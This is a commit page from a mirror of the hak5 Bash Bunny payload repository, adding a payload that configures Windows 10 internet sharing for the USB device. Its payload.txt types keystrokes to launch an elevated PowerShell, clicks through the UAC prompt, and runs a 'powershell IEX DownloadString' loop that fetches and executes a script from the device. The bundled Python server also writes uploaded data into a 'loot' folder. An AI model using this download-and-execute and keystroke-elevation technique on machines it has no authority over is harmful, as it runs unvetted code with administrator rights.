hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Added Windows NIC Sharing payload (#233)

Browse Source 
Bash Bunny payload for setting up Internet Sharing with Windows 10
This commit is contained in:
Layer8Err
2017-08-14 21:23:19 -04:00
committed by Sebastian Kinne
parent 761dd0e433
commit 61793e6f0b
4 changed files with 228 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

56
payloads/library/general/Windows NIC Sharing/p.ps1 Normal file
View File

@@ -0,0 +1,56 @@
# Set up and configure NIC to share internets with BB
# Credit to wiki.bashbunny.com for the outline
# Credit to Wasabi Fan on technet for the Com-Object stuff
Clear-Host
# Share Internet connection
Write-Output "Configuring Bash Bunny for internet usage..."
Write-Output "Getting WMI info on NICs..."
$BBWMIAdapter = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress = "00:11:22:33:44:55"')
$WMIAdapters = (Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter 'MACAddress<>"00:11:22:33:44:55"') | %{ if ($_.IPAddress -ne $null) {$_}}
# Get Target GUID (shareable NIC)
# This is an imperfect method of getting the GUID, I'm just assuming that no one has
# more than 38 NICs on their Windows PC, and using it as an indicator of array dimensions
if ((($WMIAdapters.SettingID).Length -gt 1) -and (($WMIAdapters.SettingID).Length -lt 38)){
$ETHGuid = $WMIAdapters[0].SettingID
} else {
$ETHGuid = $WMIAdapters.SettingID
}
regsvr32 /s hnetcfg.dll # Register HNetCfg library
$NetSharing = New-Object -ComObject HNetCfg.HNetShare # Create NetSharingManager object
function share ($GUID, $Public) {
$Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection
$CfgSharing = $NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection) # Get sharing config
if ($Public) { $pubvar = 0 } else { $pubvar = 1 }
$CfgSharing.EnableSharing($pubvar) # Enable sharing with public (public = 0, private = 1)
}
function unshare ($GUID) {
$Connection = $NetSharing.EnumEveryConnection | ?{ $NetSharing.NetConnectionProps.Invoke($_).Guid -eq $GUID } # Find Connection
$NetSharing.INetSharingConfigurationForINetConnection.Invoke($Connection).DisableSharing() # Disable Sharing
}
Write-Output "Setting up interface sharing..."
Write-Output "Setting up interface sharing on primary NIC...."
share -GUID $ETHGuid -Public $true # Set live NIC to share public
Write-Output "Setting up interface sharing on Bash Bunny...."
share -GUID $BBWMIAdapter.SettingID -Public $false # Set Bash Bunny NIC to share private
Write-Output "Setting static IP for bash buny NIC..."
$BBWMIAdapter.EnableStatic('172.16.64.64','255.255.255.0')
Clear-Host
# Sharing should be done
Write-Output "#########################################################"
Write-Output "The Bash Bunny should now be able to access the internet"
Write-Output "You should be able to ssh into your Bash Bunny at:"
Write-Output "172.16.64.1"
Write-Output "Hit ENTER to clean up network settings"
Write-Output "#########################################################"
Pause
# Take down sharing
Write-Output "Disabling interface sharing on primary NIC...."
unshare -GUID $ETHGuid -Public $true # Stop public sharing on live NIC
Write-Output "Disabling interface sharing on Bash Bunny...."
unshare -GUID $BBWMIAdapter.SettingID # Stop private sharing on Bash Bunny NIC
EXIT

80
payloads/library/general/Windows NIC Sharing/payload.txt Normal file
View File

@@ -0,0 +1,80 @@
#!/bin/bash
##############################################
# Sharing Internet with Windows
#
# Auto-config sharing with Windows 10.
##############################################
# Other things to do once you have booted the
# bash bunny as an ethernet enabled box
#
# Windows
# Start > Run > "ncpa.cpl" Enter
# (Open Network Connections)
#Q DELAY 100
#RUN WIN ncpa.cpl
#Q DELAY 1000
#Q ENTER
# Identify Bash Bunny interface
# Should be named:
# "USB Ethernet/RNDIS Gadget"
# Sharing is caring
# Right-Click Ineternet interface click on
# "Properties" and select "Sharing" tab
#
# From "Sharing" tab check
# "Allow other netwrk usrs 2 connect... thru dis connection"
# Select the Bash Bunny Gadget and hit "OK"
# Right-click on Gadget and select "Properties"
#
# Generously gift an IP
# Select TCP/IPv4 and click "Properties"
# Set the IPv4=172.16.64.64 and Subnet=24-bit
# Hit all the OKs
# Or we could just have the Bash Bunny do all the work...
LED SETUP
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE2
DELAY 500
Q GUI r
Q DELAY 1000
Q STRING powershell Start-Process powershell -Verb runAs
Q DELAY 1000
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 500
Q ALT o
Q DELAY 500
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
Q ENTER
Q DELAY 800
LED SPECIAL2
#Powershell Payload: first wait for connection to bunny webserver, then run network config
#Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q STRING "Start-Sleep -Seconds 15 ; while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1')}}"
Q DELAY 300
Q ENTER
LED W
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED CLEANUP
Q DELAY 200
LED B
python $SWITCHDIR/server.py
Q DELAY 5000
LED FINISH

32
payloads/library/general/Windows NIC Sharing/readme.md Normal file
View File

@@ -0,0 +1,32 @@
# Bash Bunny NIC Sharing from Windows
* Author: hayze
* Version: Version 0.1
* Target: Windows 10
## Description
Sets up Networking for Bash Bunny. You should be able to SSH to the Bash Bunny
at 172.16.64.1 once networking has been configured.
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Magenta (solid) | Setting mode to HID |
| Yellow (blinking) | Running PowerShell as admin |
| Cyan (blinking) | Entering PowerShell IEX command |
| White (solid) | Setting mode to RNDIS_ETHERNET |
| White (blinking) | Running WebServer for IEX script |
| Blue (solid) | Running PowerShell script |
| Green | Windows should be configured to share |
## Credits
QDBA for the server py and readme layout
Hak5 for the Windows sharing instructions
Wasabi Fan on technet for the Com-Object stuff

60
payloads/library/general/Windows NIC Sharing/server.py Normal file
View File

@@ -0,0 +1,60 @@
import os
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
IS_RUNNING = True
abspath = os.path.abspath(__file__)
CURR_DIR = os.path.dirname(abspath)
os.chdir(CURR_DIR)
class RequestServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200, "ok")
self.send_header('Content-type', 'text/plain')
self.protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(200, "ok")
self.send_header("Content-type", "text/plain")
self.end_headers()
try:
with open(CURR_DIR + self.path, 'r+') as f:
data = f.read()
self.wfile.write(data)
except IOError:
self.send_response(404)
self.wfile.write(CURR_DIR)
return
def do_POST(self):
global IS_RUNNING
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
content_length = int(self.headers['Content-Length'])
filename = self.path[1:]
if filename == 'EOF':
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}".format(filename), "w+") as f:
f.write(data)
f.close()
self.end_headers()
IS_RUNNING = False
else:
data = self.rfile.read(content_length)
with open(CURR_DIR + "/loot/{}.txt".format(filename), "w+") as f:
f.write(data)
f.close()
self._set_headers()
def run(server_class=HTTPServer, handler_class=RequestServer, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
while IS_RUNNING:
httpd.handle_request()
if __name__ == '__main__':
run()